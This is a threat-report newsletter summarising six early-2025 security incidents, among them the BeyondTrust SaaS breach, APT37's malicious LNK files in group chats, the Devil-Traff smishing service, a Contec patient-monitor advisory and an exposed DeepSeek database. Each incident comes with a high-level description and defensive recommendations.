03.02.25 Threat Report

BeyondTrust Zero-Day Breach Exposes SaaS Customers

BeyondTrust, a leading identity and access management firm, confirmed a security breach affecting 17 customers of its Remote Support SaaS platform. The breach was discovered on 2nd December 2024 and linked to a zero-day vulnerability in a third-party application.

How the Attack Happened:

• The attackers obtained an API key, which allowed them to reset local application passwords and gain unauthorised access to affected accounts.
• The breach remained undetected for an unspecified period, posing significant security risks to customers relying on BeyondTrust's remote support solutions.
• BeyondTrust patched the vulnerability and alerted affected clients.

Potential Impact:

• Unauthorised remote access to sensitive IT environments.
• Credential exposure and potential privilege escalation within compromised accounts.
• Risk of further lateral movement within affected organisations if credentials were reused elsewhere.

Recommendation:

✅ Change all credentials associated with BeyondTrust's Remote Support SaaS platform.
✅ Review access logs for any suspicious login attempts.
✅ Enable multi-factor authentication (MFA) to prevent unauthorised access.
✅ Stay updated on BeyondTrust's advisories and implement security patches immediately.

North Korean APT37 Targets Group Chats with Malicious LNK Files

APT37, a North Korean state-sponsored hacking group (also known as ScarCruft or Reaper), has been found distributing malicious LNK shortcut files via group chat applications. This new social engineering tactic tricks users into executing malware, granting attackers control over infected machines.

Attack Details:

• Attackers send LNK (Windows shortcut) files disguised as legitimate documents within chat groups.
• When opened, the LNK file executes malicious scripts that download additional malware onto the victim’s machine.
• The malware can steal sensitive information, install backdoors, or execute further payloads.
• The attack targets government entities, journalists, and organisations in industries of interest to North Korea (e.g., defence, technology, and intelligence).

Potential Impact:

• Espionage & data theft: APT37 is known for intelligence gathering and surveillance.
• Credential harvesting: The malware can collect usernames, passwords, and access tokens.
• Long-term persistence: Attackers use these infections to establish a foothold for future attacks.

Recommendation:

✅ Train employees on social engineering risks and avoiding unsolicited files in chat applications.
✅ Block LNK files in email and chat platforms where possible.
✅ Use endpoint detection and response (EDR) tools to identify malicious shortcuts and scripts.
✅ Apply security patches to prevent malware from exploiting software vulnerabilities.

'Devil-Traff': A New Large-Scale SMS Phishing-as-a-Service Platform

Cyber criminals have developed a new phishing-as-a-service (PhaaS) platform called "Devil-Traff", which allows threat actors to send bulk phishing SMS messages at scale.

This turnkey phishing platform lowers the barrier for cybercriminals, making mass smishing (SMS phishing) attacks easier and more accessible than ever before.

How It Works:

• Devil-Traff operates as a dark web service, enabling non-technical criminals to conduct phishing campaigns without writing any code.
• Attackers use fake bank alerts, delivery notifications, or payment fraud messages to lure victims into entering personal information on malicious websites.
• The platform provides automation features to send hundreds of thousands of SMS messages per day.
• Some variants also distribute mobile malware that can steal authentication credentials and payment data.

Potential Impact:

• Financial fraud: Victims unknowingly provide banking credentials.
• Identity theft: Attackers can harvest personal data for further cybercrime.
• Credential stuffing attacks: Stolen credentials are used for hacking into multiple accounts.

Recommendation:

✅ Warn employees and customers about SMS phishing attacks.
✅ Block known phishing domains and monitor for suspicious URLs.
✅ Encourage multi-factor authentication (MFA) to prevent credential theft from leading to account takeovers.
✅ Deploy mobile security solutions that can detect and block malicious links.

Microsoft Advertisers Targeted via Malicious Google Ads

Cyber criminals have launched a targeted phishing campaign against Microsoft advertisers by creating fraudulent Google Ads that redirect users to credential-stealing websites.

Attack Details:

• Hackers purchase Google Ads and use SEO poisoning techniques to make their fake ads appear at the top of search results.
• Clicking on the malicious ads redirects victims to phishing websites that closely mimic Microsoft’s official login portals.
• Attackers then harvest credentials to compromise corporate Microsoft accounts, leading to data breaches and account takeovers.

Potential Impact:

• Compromised Microsoft accounts could be used for further phishing attacks within organisations.
• Data theft & unauthorised access to sensitive corporate information.
• Financial losses from fraudulent transactions if attackers gain control of advertising accounts.

Recommendation:

✅ Be cautious when clicking on advertisements, even those appearing at the top of Google search results.
✅ Verify website URLs before entering credentials.
✅ Enable multi-factor authentication (MFA) on all Microsoft accounts.
✅ Consider using ad-blocking extensions to limit exposure to malicious ads.

CISA Warning: Critical Vulnerabilities in Contec Health CMS8000 Patient Monitors

The Cyber security and Infrastructure Security Agency (CISA) has issued a security advisory regarding multiple vulnerabilities in the Contec Health CMS8000 Patient Monitor, which is used in medical facilities worldwide.

Key Vulnerabilities:

• Out-of-bounds write: Could allow remote code execution (RCE).
• Hardcoded backdoor accounts: Enables unauthorised access to patient data.
• Privacy leakage: Attackers could intercept confidential patient information.

Potential Impact:

• Remote hijacking of patient monitoring systems.
• Data breaches exposing sensitive medical records.
• Regulatory penalties for healthcare providers failing to secure medical devices.

Recommendation:

✅ Immediately update firmware on all affected devices.
✅ Ensure CMS8000 monitors are not exposed to the public internet.
✅ Use network segmentation to prevent unauthorised access.

DeepSeek AI Database Exposed: Over 1 Million Log Lines, Secret Keys Leaked

Buzzy Chinese artificial intelligence (AI) startup DeepSeek, which has seen a meteoric rise in popularity, left one of its databases exposed on the internet, potentially allowing malicious actors to access sensitive data.

The ClickHouse database, which was publicly accessible, allowed full control over database operations, including access to internal data.

Attack Details:

• The exposed database contained over a million lines of log streams, including:
  • Chat History
  • Secret keys
  • Backend details
  • API secrets
  • Operational metadata
• The database was accessible without authentication, meaning anyone could have accessed it using ClickHouse’s HTTP interface via a web browser.
• The security hole has since been patched following responsible disclosure from Wiz researchers.

Potential Impact:

• Unauthorised access to DeepSeek’s AI systems, potentially compromising its intellectual property.
• Credential exposure could enable privilege escalation within DeepSeek’s environment.
• Risk of stolen AI models or sensitive operational metadata falling into the hands of competitors or cyber criminals.
• National security concerns surrounding DeepSeek’s ties to China have prompted scrutiny from the U.S. and European regulators.

Larger Concerns Around AI Security & Privacy

• The rapid adoption of AI services without proper security controls is inherently risky, as seen in this case.
• AI models handle massive volumes of sensitive data, requiring strict access controls to prevent leaks.
• Privacy regulators in Italy and Ireland have launched investigations into DeepSeek’s data handling and compliance practices.
• OpenAI and Microsoft are probing whether DeepSeek unlawfully used OpenAI's API outputs to train its own models, a process known as distillation.

Recommendation:

✅ Review AI security practices to prevent unintended data exposure.
✅ Enforce strong authentication controls on all AI-related databases.
✅ Monitor for unauthorised API access to detect potential data exfiltration or misuse.
✅ Stay compliant with evolving privacy regulations regarding AI and data security.